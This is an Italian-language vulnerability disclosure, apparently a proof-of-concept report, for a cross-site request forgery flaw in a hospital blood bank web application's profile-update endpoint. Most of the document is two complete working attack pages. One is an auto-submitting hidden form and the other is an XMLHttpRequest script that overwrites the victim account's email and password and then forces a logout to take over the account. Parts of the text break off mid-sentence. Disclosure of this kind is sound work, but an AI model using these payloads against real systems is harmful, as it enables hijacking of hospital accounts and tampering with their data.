
Un POC CSRF per l'aggiornamento del profilo di un ospedale che porta all'account takeover.
/file/updateprofile.phpEsiste una vulnerabilità CSRF su questo endpoint /file/updateprofile.php che consente a un utente remoto di aggiornare i dettagli dell'utente di un ospedale e può portare al dirottamento dell'account, poiché l'attaccante può aggiornare tutte le informazioni dall'email alla password, aumentando efficacemente le possibilità di dirottamento dell'account
Uno sfruttamento riuscito può portare ad azioni non autorizzate, ad esempio la cancellazione dei dati per conto della vittima. Inoltre, ciò potrebbe essere sfruttato visitando siti web malevoli contenenti il payload.
Di seguito è riportato un esempio di Attacco CSRF POC che aggiorna i dettagli del profilo di un account ospedaliero loggato; ospita il file su un dominio controllato dall'attaccante, nel mio caso stavo usando localhost:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF PoC with Logout Redirect</title>
</head>
<body>
<h2>CSRF Proof of Concept with Chained Logout</h2>
<!-- Form to exploit CSRF vulnerability for updating profile -->
<form id="csrfForm" action="http://localhost.local/bloodbank/file/updateprofile.php" method="POST">
<input type="hidden" name="hname" value="parirenyatwa">
<input type="hidden" name="hemail" value="[email protected]">
<input type="hidden" name="hpassword" value="pari1234">
<input type="hidden" name="hphone" value="0777054000">
<input type="hidden" name="hcity" value="harare">
<input type="hidden" name="update" value="Update">
</form>
<script>
// Submit the CSRF form to update profile
document.getElementById("csrfForm").submit();
</script>
</body>
</html>
logout CSRF, ottenendo così il dirottamento dell'account
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF PoC with XMLHttpRequest</title>
</head>
<body>
<h2>CSRF Proof of Concept with XMLHttpRequest and Redirect</h2>
<script>
// Define the target URLs for the CSRF attack
const updateUrl = "http://localhost.local/bloodbank/file/updateprofile.php";
const logoutUrl = "http://localhost.local/bloodbank/logout.php";
// Data for the profile update CSRF request
const updateData = "hname=parirenyatwa&hemail=pari%40hospital.co.zw&hpassword=pari1234&hphone=0777054000&hcity=harare&update=Update";
// Function to send the XMLHttpRequest
function sendCSRFUpdate() {
const xhr = new XMLHttpRequest();
xhr.open("POST", updateUrl, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// When the request is complete, redirect to the logout page
xhr.onload = function() {
if (xhr.status === 200) {
console.log("Profile update CSRF request completed");
// Redirect to logout URL to log the victim out
window.location.href = logoutUrl;
} else {
console.error("Profile update failed with status:", xhr.status);
}
};
// Send the request with the update data
xhr.send(updateData);
}
// Trigger the CSRF attack by sending the update request
sendCSRFUpdate();
</script>
</body>
</html>
csrf tokens nelle richieste ed evitare anche che le richieste GET eseguano azioni di modifica dello stato